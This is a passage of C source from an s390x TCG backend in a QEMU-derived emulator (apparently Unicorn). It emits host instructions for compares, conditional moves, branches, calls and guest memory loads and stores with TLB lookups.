tcg_out_insn(s, RIL, XILF, dest, val); return; } if ((val & 0x00000000ffffffffull) == 0) { tcg_out_insn(s, RIL, XIHF, dest, val >> 32); return; } } /* Use the constant pool if USE_REG_TB, but not for small constants. */ if (maybe_out_small_movi(s, type, TCG_TMP0, val)) { if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, XR, dest, TCG_TMP0); } else { tcg_out_insn(s, RRE, XGR, dest, TCG_TMP0); } } else if (USE_REG_TB) { tcg_out_insn(s, RXY, XG, dest, TCG_REG_TB, TCG_REG_NONE, 0); new_pool_label(s, val, R_390_20, s->code_ptr - 2, -(intptr_t)s->code_gen_ptr); } else { /* Perform the xor by parts. 
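   XILF flips the low 32 bits and XIHF the high 32 bits, so at most
   two instructions are needed, and a half whose mask bits are all
   zero is skipped entirely.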
*/ tcg_debug_assert(s390_facilities & FACILITY_EXT_IMM); if (val & 0xffffffff) { tcg_out_insn(s, RIL, XILF, dest, val); } if (val > 0xffffffff) { tcg_out_insn(s, RIL, XIHF, dest, val >> 32); } } } static int tgen_cmp(TCGContext *s, TCGType type, TCGCond c, TCGReg r1, TCGArg c2, bool c2const, bool need_carry) { bool is_unsigned = is_unsigned_cond(c); S390Opcode op; if (c2const) { if (c2 == 0) { if (!(is_unsigned && need_carry)) { if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, LTR, r1, r1); } else { tcg_out_insn(s, RRE, LTGR, r1, r1); } return tcg_cond_to_ltr_cond[c]; } } if (!is_unsigned && c2 == (int16_t)c2) { op = (type == TCG_TYPE_I32 ? RI_CHI : RI_CGHI); tcg_out_insn_RI(s, op, r1, c2); goto exit; } if (s390_facilities & FACILITY_EXT_IMM) { if (type == TCG_TYPE_I32) { op = (is_unsigned ? RIL_CLFI : RIL_CFI); tcg_out_insn_RIL(s, op, r1, c2); goto exit; } else if (c2 == (is_unsigned ? (uint32_t)c2 : (int32_t)c2)) { op = (is_unsigned ? RIL_CLGFI : RIL_CGFI); tcg_out_insn_RIL(s, op, r1, c2); goto exit; } } /* Use the constant pool, but not for small constants. */ if (maybe_out_small_movi(s, type, TCG_TMP0, c2)) { c2 = TCG_TMP0; /* fall through to reg-reg */ } else if (USE_REG_TB) { if (type == TCG_TYPE_I32) { op = (is_unsigned ? RXY_CLY : RXY_CY); tcg_out_insn_RXY(s, op, r1, TCG_REG_TB, TCG_REG_NONE, 0); new_pool_label(s, (uint32_t)c2, R_390_20, s->code_ptr - 2, 4 - (intptr_t)s->code_gen_ptr); } else { op = (is_unsigned ? RXY_CLG : RXY_CG); tcg_out_insn_RXY(s, op, r1, TCG_REG_TB, TCG_REG_NONE, 0); new_pool_label(s, c2, R_390_20, s->code_ptr - 2, -(intptr_t)s->code_gen_ptr); } goto exit; } else { if (type == TCG_TYPE_I32) { op = (is_unsigned ? RIL_CLRL : RIL_CRL); tcg_out_insn_RIL(s, op, r1, 0); new_pool_label(s, (uint32_t)c2, R_390_PC32DBL, s->code_ptr - 2, 2 + 4); } else { op = (is_unsigned ? RIL_CLGRL : RIL_CGRL); tcg_out_insn_RIL(s, op, r1, 0); new_pool_label(s, c2, R_390_PC32DBL, s->code_ptr - 2, 2); } goto exit; } } if (type == TCG_TYPE_I32) { op = (is_unsigned ? RR_CLR : RR_CR); tcg_out_insn_RR(s, op, r1, c2); } else { op = (is_unsigned ? RRE_CLGR : RRE_CGR); tcg_out_insn_RRE(s, op, r1, c2); } exit: return tcg_cond_to_s390_cond[c]; } static void tgen_setcond(TCGContext *s, TCGType type, TCGCond cond, TCGReg dest, TCGReg c1, TCGArg c2, int c2const) { int cc; bool have_loc; /* With LOC2, we can always emit the minimum 3 insns. */ if (s390_facilities & FACILITY_LOAD_ON_COND2) { /* Emit: d = 0, d = (cc ? 1 : d). */ cc = tgen_cmp(s, type, cond, c1, c2, c2const, false); tcg_out_movi(s, TCG_TYPE_I64, dest, 0); tcg_out_insn(s, RIE, LOCGHI, dest, 1, cc); return; } have_loc = (s390_facilities & FACILITY_LOAD_ON_COND) != 0; /* For HAVE_LOC, only the paths through GTU/GT/LEU/LE are smaller. */ restart: switch (cond) { case TCG_COND_NE: /* X != 0 is X > 0. */ if (c2const && c2 == 0) { cond = TCG_COND_GTU; } else { break; } /* fallthru */ case TCG_COND_GTU: case TCG_COND_GT: /* The result of a compare has CC=2 for GT and CC=3 unused. ADD LOGICAL WITH CARRY considers (CC & 2) the carry bit. */ tgen_cmp(s, type, cond, c1, c2, c2const, true); tcg_out_movi(s, type, dest, 0); tcg_out_insn(s, RRE, ALCGR, dest, dest); return; case TCG_COND_EQ: /* X == 0 is X <= 0. */ if (c2const && c2 == 0) { cond = TCG_COND_LEU; } else { break; } /* fallthru */ case TCG_COND_LEU: case TCG_COND_LE: /* As above, but we're looking for borrow, or !carry. The second insn computes d - d - borrow, or -1 for true and 0 for false. So we must mask to 1 bit afterward. 
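   For example, an unsigned c1 <= c2 leaves the carry clear after the
   compare, so the borrow is 1 and SLBGR computes d - d - 1 = -1;
   the final AND with 1 turns that into the boolean result 1.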
*/ tgen_cmp(s, type, cond, c1, c2, c2const, true); tcg_out_insn(s, RRE, SLBGR, dest, dest); tgen_andi(s, type, dest, 1); return; case TCG_COND_GEU: case TCG_COND_LTU: case TCG_COND_LT: case TCG_COND_GE: /* Swap operands so that we can use LEU/GTU/GT/LE. */ if (c2const) { if (have_loc) { break; } tcg_out_movi(s, type, TCG_TMP0, c2); c2 = c1; c2const = 0; c1 = TCG_TMP0; } else { TCGReg t = c1; c1 = c2; c2 = t; } cond = tcg_swap_cond(cond); goto restart; default: g_assert_not_reached(); } cc = tgen_cmp(s, type, cond, c1, c2, c2const, false); if (have_loc) { /* Emit: d = 0, t = 1, d = (cc ? t : d). */ tcg_out_movi(s, TCG_TYPE_I64, dest, 0); tcg_out_movi(s, TCG_TYPE_I64, TCG_TMP0, 1); tcg_out_insn(s, RRF, LOCGR, dest, TCG_TMP0, cc); } else { /* Emit: d = 1; if (cc) goto over; d = 0; over: */ tcg_out_movi(s, type, dest, 1); tcg_out_insn(s, RI, BRC, cc, (4 + 4) >> 1); tcg_out_movi(s, type, dest, 0); } } static void tgen_movcond(TCGContext *s, TCGType type, TCGCond c, TCGReg dest, TCGReg c1, TCGArg c2, int c2const, TCGArg v3, int v3const) { int cc; if (s390_facilities & FACILITY_LOAD_ON_COND) { cc = tgen_cmp(s, type, c, c1, c2, c2const, false); if (v3const) { tcg_out_insn(s, RIE, LOCGHI, dest, v3, cc); } else { tcg_out_insn(s, RRF, LOCGR, dest, v3, cc); } } else { c = tcg_invert_cond(c); cc = tgen_cmp(s, type, c, c1, c2, c2const, false); /* Emit: if (cc) goto over; dest = r3; over: */ tcg_out_insn(s, RI, BRC, cc, (4 + 4) >> 1); tcg_out_insn(s, RRE, LGR, dest, v3); } } static void tgen_clz(TCGContext *s, TCGReg dest, TCGReg a1, TCGArg a2, int a2const) { /* Since this sets both R and R+1, we have no choice but to store the result into R0, allowing R1 == TCG_TMP0 to be clobbered as well. */ QEMU_BUILD_BUG_ON(TCG_TMP0 != TCG_REG_R1); tcg_out_insn(s, RRE, FLOGR, TCG_REG_R0, a1); if (a2const && a2 == 64) { tcg_out_mov(s, TCG_TYPE_I64, dest, TCG_REG_R0); } else { if (a2const) { tcg_out_movi(s, TCG_TYPE_I64, dest, a2); } else { tcg_out_mov(s, TCG_TYPE_I64, dest, a2); } if (s390_facilities & FACILITY_LOAD_ON_COND) { /* Emit: if (one bit found) dest = r0. 
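   FLOGR sets condition code 0 when the operand was zero (no bit
   found) and condition code 2 when a leftmost one bit was found, so
   the LOCGR mask of 2 copies R0 into dest only on a hit.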
*/ tcg_out_insn(s, RRF, LOCGR, dest, TCG_REG_R0, 2); } else { /* Emit: if (no one bit found) goto over; dest = r0; over: */ tcg_out_insn(s, RI, BRC, 8, (4 + 4) >> 1); tcg_out_insn(s, RRE, LGR, dest, TCG_REG_R0); } } } static void tgen_deposit(TCGContext *s, TCGReg dest, TCGReg src, int ofs, int len, int z) { int lsb = (63 - ofs); int msb = lsb - (len - 1); tcg_out_risbg(s, dest, src, msb, lsb, ofs, z); } static void tgen_extract(TCGContext *s, TCGReg dest, TCGReg src, int ofs, int len) { tcg_out_risbg(s, dest, src, 64 - len, 63, 64 - ofs, 1); } static void tgen_gotoi(TCGContext *s, int cc, tcg_insn_unit *dest) { ptrdiff_t off = dest - s->code_ptr; if (off == (int16_t)off) { tcg_out_insn(s, RI, BRC, cc, off); } else if (off == (int32_t)off) { tcg_out_insn(s, RIL, BRCL, cc, off); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, (uintptr_t)dest); tcg_out_insn(s, RR, BCR, cc, TCG_TMP0); } } static void tgen_branch(TCGContext *s, int cc, TCGLabel *l) { if (l->has_value) { tgen_gotoi(s, cc, l->u.value_ptr); } else if (USE_LONG_BRANCHES) { tcg_out16(s, RIL_BRCL | (cc << 4)); tcg_out_reloc(s, s->code_ptr, R_390_PC32DBL, l, 2); s->code_ptr += 2; } else { tcg_out16(s, RI_BRC | (cc << 4)); tcg_out_reloc(s, s->code_ptr, R_390_PC16DBL, l, 2); s->code_ptr += 1; } } static void tgen_compare_branch(TCGContext *s, S390Opcode opc, int cc, TCGReg r1, TCGReg r2, TCGLabel *l) { intptr_t off = 0; if (l->has_value) { off = l->u.value_ptr - s->code_ptr; tcg_debug_assert(off == (int16_t)off); } else { tcg_out_reloc(s, s->code_ptr + 1, R_390_PC16DBL, l, 2); } tcg_out16(s, (opc & 0xff00) | (r1 << 4) | r2); tcg_out16(s, off); tcg_out16(s, cc << 12 | (opc & 0xff)); } static void tgen_compare_imm_branch(TCGContext *s, S390Opcode opc, int cc, TCGReg r1, int i2, TCGLabel *l) { tcg_target_long off = 0; if (l->has_value) { off = l->u.value_ptr - s->code_ptr; tcg_debug_assert(off == (int16_t)off); } else { tcg_out_reloc(s, s->code_ptr + 1, R_390_PC16DBL, l, 2); } tcg_out16(s, (opc & 0xff00) | (r1 << 4) | cc); tcg_out16(s, off); tcg_out16(s, (i2 << 8) | (opc & 0xff)); } static void tgen_brcond(TCGContext *s, TCGType type, TCGCond c, TCGReg r1, TCGArg c2, int c2const, TCGLabel *l) { int cc; if (s390_facilities & FACILITY_GEN_INST_EXT) { bool is_unsigned = is_unsigned_cond(c); bool in_range; S390Opcode opc; cc = tcg_cond_to_s390_cond[c]; if (!c2const) { opc = (type == TCG_TYPE_I32 ? (is_unsigned ? RIE_CLRJ : RIE_CRJ) : (is_unsigned ? RIE_CLGRJ : RIE_CGRJ)); tgen_compare_branch(s, opc, cc, r1, c2, l); return; } /* COMPARE IMMEDIATE AND BRANCH RELATIVE has an 8-bit immediate field. If the immediate we've been given does not fit that range, we'll fall back to separate compare and branch instructions using the larger comparison range afforded by COMPARE IMMEDIATE. 
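For example, a signed 32-bit brcond against 100 fits the -128..127 immediate of CIJ and is emitted as the single compare-and-branch, while one against 200 does not, and falls back to CFI followed by a conditional branch.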
*/ if (type == TCG_TYPE_I32) { if (is_unsigned) { opc = RIE_CLIJ; in_range = (uint32_t)c2 == (uint8_t)c2; } else { opc = RIE_CIJ; in_range = (int32_t)c2 == (int8_t)c2; } } else { if (is_unsigned) { opc = RIE_CLGIJ; in_range = (uint64_t)c2 == (uint8_t)c2; } else { opc = RIE_CGIJ; in_range = (int64_t)c2 == (int8_t)c2; } } if (in_range) { tgen_compare_imm_branch(s, opc, cc, r1, c2, l); return; } } cc = tgen_cmp(s, type, c, r1, c2, c2const, false); tgen_branch(s, cc, l); } static void tcg_out_call(TCGContext *s, tcg_insn_unit *dest) { ptrdiff_t off = dest - s->code_ptr; if (off == (int32_t)off) { tcg_out_insn(s, RIL, BRASL, TCG_REG_R14, off); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, (uintptr_t)dest); tcg_out_insn(s, RR, BASR, TCG_REG_R14, TCG_TMP0); } } static void tcg_out_qemu_ld_direct(TCGContext *s, MemOp opc, TCGReg data, TCGReg base, TCGReg index, int disp) { switch (opc & (MO_SSIZE | MO_BSWAP)) { case MO_UB: tcg_out_insn(s, RXY, LLGC, data, base, index, disp); break; case MO_SB: tcg_out_insn(s, RXY, LGB, data, base, index, disp); break; case MO_UW | MO_BSWAP: /* swapped unsigned halfword load with upper bits zeroed */ tcg_out_insn(s, RXY, LRVH, data, base, index, disp); tgen_ext16u(s, TCG_TYPE_I64, data, data); break; case MO_UW: tcg_out_insn(s, RXY, LLGH, data, base, index, disp); break; case MO_SW | MO_BSWAP: /* swapped sign-extended halfword load */ tcg_out_insn(s, RXY, LRVH, data, base, index, disp); tgen_ext16s(s, TCG_TYPE_I64, data, data); break; case MO_SW: tcg_out_insn(s, RXY, LGH, data, base, index, disp); break; case MO_UL | MO_BSWAP: /* swapped unsigned int load with upper bits zeroed */ tcg_out_insn(s, RXY, LRV, data, base, index, disp); tgen_ext32u(s, data, data); break; case MO_UL: tcg_out_insn(s, RXY, LLGF, data, base, index, disp); break; case MO_SL | MO_BSWAP: /* swapped sign-extended int load */ tcg_out_insn(s, RXY, LRV, data, base, index, disp); tgen_ext32s(s, data, data); break; case MO_SL: tcg_out_insn(s, RXY, LGF, data, base, index, disp); break; case MO_Q | MO_BSWAP: tcg_out_insn(s, RXY, LRVG, data, base, index, disp); break; case MO_Q: tcg_out_insn(s, RXY, LG, data, base, index, disp); break; default: tcg_abort(); } } static void tcg_out_qemu_st_direct(TCGContext *s, MemOp opc, TCGReg data, TCGReg base, TCGReg index, int disp) { switch (opc & (MO_SIZE | MO_BSWAP)) { case MO_UB: if (disp >= 0 && disp < 0x1000) { tcg_out_insn(s, RX, STC, data, base, index, disp); } else { tcg_out_insn(s, RXY, STCY, data, base, index, disp); } break; case MO_UW | MO_BSWAP: tcg_out_insn(s, RXY, STRVH, data, base, index, disp); break; case MO_UW: if (disp >= 0 && disp < 0x1000) { tcg_out_insn(s, RX, STH, data, base, index, disp); } else { tcg_out_insn(s, RXY, STHY, data, base, index, disp); } break; case MO_UL | MO_BSWAP: tcg_out_insn(s, RXY, STRV, data, base, index, disp); break; case MO_UL: if (disp >= 0 && disp < 0x1000) { tcg_out_insn(s, RX, ST, data, base, index, disp); } else { tcg_out_insn(s, RXY, STY, data, base, index, disp); } break; case MO_Q | MO_BSWAP: tcg_out_insn(s, RXY, STRVG, data, base, index, disp); break; case MO_Q: tcg_out_insn(s, RXY, STG, data, base, index, disp); break; default: tcg_abort(); } } #if defined(CONFIG_SOFTMMU) #include "../tcg-ldst.inc.c" /* We're expecting to use a 20-bit negative offset on the tlb memory ops. */ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -(1 << 19)); /* Load and compare a TLB entry, leaving the flags set. Loads the TLB addend into R2. 
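In outline (a sketch of the sequence below, not extra emitted code): R2 = (addr >> (TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS)) & fast->mask; R2 += fast->table; R3 = (addr + a_off) & (TARGET_PAGE_MASK | a_mask); compare R3 against the entry's addr_read/addr_write field; then load the addend from the entry into R2.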
Returns a register with the sanitized guest address. */ static TCGReg tcg_out_tlb_read(TCGContext *s, TCGReg addr_reg, MemOp opc, int mem_index, bool is_ld) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif unsigned s_bits = opc & MO_SIZE; unsigned a_bits = get_alignment_bits(opc); unsigned s_mask = (1 << s_bits) - 1; unsigned a_mask = (1 << a_bits) - 1; int fast_off = TLB_MASK_TABLE_OFS(mem_index); int mask_off = fast_off + offsetof(CPUTLBDescFast, mask); int table_off = fast_off + offsetof(CPUTLBDescFast, table); int ofs, a_off; uint64_t tlb_mask; tcg_out_sh64(s, RSY_SRLG, TCG_REG_R2, addr_reg, TCG_REG_NONE, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); tcg_out_insn(s, RXY, NG, TCG_REG_R2, TCG_AREG0, TCG_REG_NONE, mask_off); tcg_out_insn(s, RXY, AG, TCG_REG_R2, TCG_AREG0, TCG_REG_NONE, table_off); /* For aligned accesses, we check the first byte and include the alignment bits within the address. For unaligned access, we check that we don't cross pages using the address of the last byte of the access. */ a_off = (a_bits >= s_bits ? 0 : s_mask - a_mask); tlb_mask = (uint64_t)TARGET_PAGE_MASK | a_mask; if ((s390_facilities & FACILITY_GEN_INST_EXT) && a_off == 0) { tgen_andi_risbg(s, TCG_REG_R3, addr_reg, tlb_mask); } else { tcg_out_insn(s, RX, LA, TCG_REG_R3, addr_reg, TCG_REG_NONE, a_off); tgen_andi(s, TCG_TYPE_TL, TCG_REG_R3, tlb_mask); } if (is_ld) { ofs = offsetof(CPUTLBEntry, addr_read); } else { ofs = offsetof(CPUTLBEntry, addr_write); } if (TARGET_LONG_BITS == 32) { tcg_out_insn(s, RX, C, TCG_REG_R3, TCG_REG_R2, TCG_REG_NONE, ofs); } else { tcg_out_insn(s, RXY, CG, TCG_REG_R3, TCG_REG_R2, TCG_REG_NONE, ofs); } tcg_out_insn(s, RXY, LG, TCG_REG_R2, TCG_REG_R2, TCG_REG_NONE, offsetof(CPUTLBEntry, addend)); if (TARGET_LONG_BITS == 32) { tgen_ext32u(s, TCG_REG_R3, addr_reg); return TCG_REG_R3; } return addr_reg; } static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOpIdx oi, TCGReg data, TCGReg addr, tcg_insn_unit *raddr, tcg_insn_unit *label_ptr) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->datalo_reg = data; label->addrlo_reg = addr; label->raddr = raddr; label->label_ptr[0] = label_ptr; } static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGReg addr_reg = lb->addrlo_reg; TCGReg data_reg = lb->datalo_reg; TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); if (!patch_reloc(lb->label_ptr[0], R_390_PC16DBL, (intptr_t)s->code_ptr, 2)) { return false; } tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_R2, TCG_AREG0); if (TARGET_LONG_BITS == 64) { tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_R3, addr_reg); } tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_R4, oi); tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R5, (uintptr_t)lb->raddr); tcg_out_call(s, qemu_ld_helpers[opc & (MO_BSWAP | MO_SSIZE)]); tcg_out_mov(s, TCG_TYPE_I64, data_reg, TCG_REG_R2); tgen_gotoi(s, S390_CC_ALWAYS, lb->raddr); return true; } static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGReg addr_reg = lb->addrlo_reg; TCGReg data_reg = lb->datalo_reg; TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); if (!patch_reloc(lb->label_ptr[0], R_390_PC16DBL, (intptr_t)s->code_ptr, 2)) { return false; } tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_R2, TCG_AREG0); if (TARGET_LONG_BITS == 64) { tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_R3, addr_reg); } switch (opc & MO_SIZE) { case MO_UB: tgen_ext8u(s, TCG_TYPE_I64, TCG_REG_R4, data_reg); break; case MO_UW: tgen_ext16u(s, TCG_TYPE_I64, TCG_REG_R4, data_reg); break; case MO_UL: tgen_ext32u(s, TCG_REG_R4, data_reg);
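/* Note: the sub-64-bit cases here zero-extend the store data into R4; presumably this is because the s390x calling convention expects narrow integer arguments to be extended by the caller before the helper call below. */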
break; case MO_Q: tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_R4, data_reg); break; default: tcg_abort(); } tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_R5, oi); tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R6, (uintptr_t)lb->raddr); tcg_out_call(s, qemu_st_helpers[opc & (MO_BSWAP | MO_SIZE)]); tgen_gotoi(s, S390_CC_ALWAYS, lb->raddr); return true; } #else static void tcg_prepare_user_ldst(TCGContext *s, TCGReg *addr_reg, TCGReg *index_reg, tcg_target_long *disp) { if (TARGET_LONG_BITS == 32) { tgen_ext32u(s, TCG_TMP0, *addr_reg); *addr_reg = TCG_TMP0; } if (guest_base < 0x80000) { *index_reg = TCG_REG_NONE; *disp = guest_base; } else { *index_reg = TCG_GUEST_BASE_REG; *disp = 0; } } #endif /* CONFIG_SOFTMMU */ static void tcg_out_qemu_ld(TCGContext* s, TCGReg data_reg, TCGReg addr_reg, TCGMemOpIdx oi) { MemOp opc = get_memop(oi); #ifdef CONFIG_SOFTMMU unsigned mem_index = get_mmuidx(oi); tcg_insn_unit *label_ptr; TCGReg base_reg; base_reg = tcg_out_tlb_read(s, addr_reg, opc, mem_index, 1); tcg_out16(s, RI_BRC | (S390_CC_NE << 4)); label_ptr = s->code_ptr; s->code_ptr += 1; tcg_out_qemu_ld_direct(s, opc, data_reg, base_reg, TCG_REG_R2, 0); add_qemu_ldst_label(s, 1, oi, data_reg, addr_reg, s->code_ptr, label_ptr); #else TCGReg index_reg; tcg_target_long disp; tcg_prepare_user_ldst(s, &addr_reg, &index_reg, &disp); tcg_out_qemu_ld_direct(s, opc, data_reg, addr_reg, index_reg, disp); #endif } static void tcg_out_qemu_st(TCGContext* s, TCGReg data_reg, TCGReg addr_reg, TCGMemOpIdx oi) { MemOp opc = get_memop(oi); #ifdef CONFIG_SOFTMMU unsigned mem_index = get_mmuidx(oi); tcg_insn_unit *label_ptr; TCGReg base_reg; base_reg = tcg_out_tlb_read(s, addr_reg, opc, mem_index, 0); tcg_out16(s, RI_BRC | (S390_CC_NE << 4)); label_ptr = s->code_ptr; s->code_ptr += 1; tcg_out_qemu_st_direct(s, opc, data_reg, base_reg, TCG_REG_R2, 0); add_qemu_ldst_label(s, 0, oi, data_reg, addr_reg, s->code_ptr, label_ptr); #else TCGReg index_reg; tcg_target_long disp; tcg_prepare_user_ldst(s, &addr_reg, &index_reg, &disp); tcg_out_qemu_st_direct(s, opc, data_reg, addr_reg, index_reg, disp); #endif } # define OP_32_64(x) \ case glue(glue(INDEX_op_,x),_i32): \ case glue(glue(INDEX_op_,x),_i64) static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args) { S390Opcode op, op2; TCGArg a0, a1, a2; switch (opc) { case INDEX_op_exit_tb: /* Reuse the zeroing that exists for goto_ptr. */ a0 = args[0]; if (a0 == 0) { tgen_gotoi(s, S390_CC_ALWAYS, s->code_gen_epilogue); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R2, a0); tgen_gotoi(s, S390_CC_ALWAYS, tb_ret_addr); } break; case INDEX_op_goto_tb: a0 = args[0]; if (s->tb_jmp_insn_offset) { /* branch displacement must be aligned for atomic patching; * see if we need to add extra nop before branch */ if (!QEMU_PTR_IS_ALIGNED(s->code_ptr + 1, 4)) { tcg_out16(s, NOP); } tcg_debug_assert(!USE_REG_TB); tcg_out16(s, RIL_BRCL | (S390_CC_ALWAYS << 4)); s->tb_jmp_insn_offset[a0] = tcg_current_code_size(s); s->code_ptr += 2; } else { /* load address stored at s->tb_jmp_target_addr + a0 */ tcg_out_ld_abs(s, TCG_TYPE_PTR, TCG_REG_TB, s->tb_jmp_target_addr + a0); /* and go there */ tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, TCG_REG_TB); } set_jmp_reset_offset(s, a0); /* For the unlinked path of goto_tb, we need to reset TCG_REG_TB to the beginning of this TB. 
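On that path TCG_REG_TB arrives holding, in effect, the address of this reset point, so the AGHI below with the negated current code size (asserted to fit its 16-bit immediate) rewinds it to the start of the TB.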
*/ if (USE_REG_TB) { int ofs = -tcg_current_code_size(s); assert(ofs == (int16_t)ofs); tcg_out_insn(s, RI, AGHI, TCG_REG_TB, ofs); } break; case INDEX_op_goto_ptr: a0 = args[0]; if (USE_REG_TB) { tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_TB, a0); } tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, a0); break; OP_32_64(ld8u): /* ??? LLC (RXY format) is only present with the extended-immediate facility, whereas LLGC is always present. */ tcg_out_mem(s, 0, RXY_LLGC, args[0], args[1], TCG_REG_NONE, args[2]); break; OP_32_64(ld8s): /* ??? LB is no smaller than LGB, so no point to using it. */ tcg_out_mem(s, 0, RXY_LGB, args[0], args[1], TCG_REG_NONE, args[2]); break; OP_32_64(ld16u): /* ??? LLH (RXY format) is only present with the extended-immediate facility, whereas LLGH is always present. */ tcg_out_mem(s, 0, RXY_LLGH, args[0], args[1], TCG_REG_NONE, args[2]); break; case INDEX_op_ld16s_i32: tcg_out_mem(s, RX_LH, RXY_LHY, args[0], args[1], TCG_REG_NONE, args[2]); break; case INDEX_op_ld_i32: tcg_out_ld(s, TCG_TYPE_I32, args[0], args[1], args[2]); break; OP_32_64(st8): tcg_out_mem(s, RX_STC, RXY_STCY, args[0], args[1], TCG_REG_NONE, args[2]); break; OP_32_64(st16): tcg_out_mem(s, RX_STH, RXY_STHY, args[0], args[1], TCG_REG_NONE, args[2]); break; case INDEX_op_st_i32: tcg_out_st(s, TCG_TYPE_I32, args[0], args[1], args[2]); break; case INDEX_op_add_i32: a0 = args[0], a1 = args[1], a2 = (int32_t)args[2]; if (const_args[2]) { do_addi_32: if (a0 == a1) { if (a2 == (int16_t)a2) { tcg_out_insn(s, RI, AHI, a0, a2); break; } if (s390_facilities & FACILITY_EXT_IMM) { tcg_out_insn(s, RIL, AFI, a0, a2); break; } } tcg_out_mem(s, RX_LA, RXY_LAY, a0, a1, TCG_REG_NONE, a2); } else if (a0 == a1) { tcg_out_insn(s, RR, AR, a0, a2); } else { tcg_out_insn(s, RX, LA, a0, a1, a2, 0); } break; case INDEX_op_sub_i32: a0 = args[0], a1 = args[1], a2 = (int32_t)args[2]; if (const_args[2]) { a2 = -a2; goto do_addi_32; } else if (a0 == a1) { tcg_out_insn(s, RR, SR, a0, a2); } else { tcg_out_insn(s, RRF, SRK, a0, a1, a2); } break; case INDEX_op_and_i32: a0 = args[0], a1 = args[1], a2 = (uint32_t)args[2]; if (const_args[2]) { tcg_out_mov(s, TCG_TYPE_I32, a0, a1); tgen_andi(s, TCG_TYPE_I32, a0, a2); } else if (a0 == a1) { tcg_out_insn(s, RR, NR, a0, a2); } else { tcg_out_insn(s, RRF, NRK, a0, a1, a2); } break; case INDEX_op_or_i32: a0 = args[0], a1 = args[1], a2 = (uint32_t)args[2]; if (const_args[2]) { tcg_out_mov(s, TCG_TYPE_I32, a0, a1); tgen_ori(s, TCG_TYPE_I32, a0, a2); } else if (a0 == a1) { tcg_out_insn(s, RR, OR, a0, a2); } else { tcg_out_insn(s, RRF, ORK, a0, a1, a2); } break; case INDEX_op_xor_i32: a0 = args[0], a1 = args[1], a2 = (uint32_t)args[2]; if (const_args[2]) { tcg_out_mov(s, TCG_TYPE_I32, a0, a1); tgen_xori(s, TCG_TYPE_I32, a0, a2); } else if (a0 == a1) { tcg_out_insn(s, RR, XR, args[0], args[2]); } else { tcg_out_insn(s, RRF, XRK, a0, a1, a2); } break; case INDEX_op_neg_i32: tcg_out_insn(s, RR, LCR, args[0], args[1]); break; case INDEX_op_mul_i32: if (const_args[2]) { if ((int32_t)args[2] == (int16_t)args[2]) { tcg_out_insn(s, RI, MHI, args[0], args[2]); } else { tcg_out_insn(s, RIL, MSFI, args[0], args[2]); } } else { tcg_out_insn(s, RRE, MSR, args[0], args[2]); } break; case INDEX_op_div2_i32: tcg_out_insn(s, RR, DR, TCG_REG_R2, args[4]); break; case INDEX_op_divu2_i32: tcg_out_insn(s, RRE, DLR, TCG_REG_R2, args[4]); break; case INDEX_op_shl_i32: op = RS_SLL; op2 = RSY_SLLK; do_shift32: a0 = args[0], a1 = args[1], a2 = (int32_t)args[2]; if (a0 == a1) { if (const_args[2]) { tcg_out_sh32(s, op, a0, TCG_REG_NONE, a2); 
} else { tcg_out_sh32(s, op, a0, a2, 0); } } else { /* Using tcg_out_sh64 here for the format; it is a 32-bit shift. */ if (const_args[2]) { tcg_out_sh64(s, op2, a0, a1, TCG_REG_NONE, a2); } else { tcg_out_sh64(s, op2, a0, a1, a2, 0); } } break; case INDEX_op_shr_i32: op = RS_SRL; op2 = RSY_SRLK; goto do_shift32; case INDEX_op_sar_i32: op = RS_SRA; op2 = RSY_SRAK; goto do_shift32; case INDEX_op_rotl_i32: /* ??? Using tcg_out_sh64 here for the format; it is a 32-bit rol. */ if (const_args[2]) { tcg_out_sh64(s, RSY_RLL, args[0], args[1], TCG_REG_NONE, args[2]); } else { tcg_out_sh64(s, RSY_RLL, args[0], args[1], args[2], 0); } break; case INDEX_op_rotr_i32: if (const_args[2]) { tcg_out_sh64(s, RSY_RLL, args[0], args[1], TCG_REG_NONE, (32 - args[2]) & 31); } else { tcg_out_insn(s, RR, LCR, TCG_TMP0, args[2]); tcg_out_sh64(s, RSY_RLL, args[0], args[1], TCG_TMP0, 0); } break; case INDEX_op_ext8s_i32: tgen_ext8s(s, TCG_TYPE_I32, args[0], args[1]); break; case INDEX_op_ext16s_i32: tgen_ext16s(s, TCG_TYPE_I32, args[0], args[1]); break; case INDEX_op_ext8u_i32: tgen_ext8u(s, TCG_TYPE_I32, args[0], args[1]); break; case INDEX_op_ext16u_i32: tgen_ext16u(s, TCG_TYPE_I32, args[0], args[1]); break; OP_32_64(bswap16): /* The TCG bswap definition requires bits 0-47 already be zero. Thus we don't need the G-type insns to implement bswap16_i64. */ tcg_out_insn(s, RRE, LRVR, args[0], args[1]); tcg_out_sh32(s, RS_SRL, args[0], TCG_REG_NONE, 16); break; OP_32_64(bswap32): tcg_out_insn(s, RRE, LRVR, args[0], args[1]); break; case 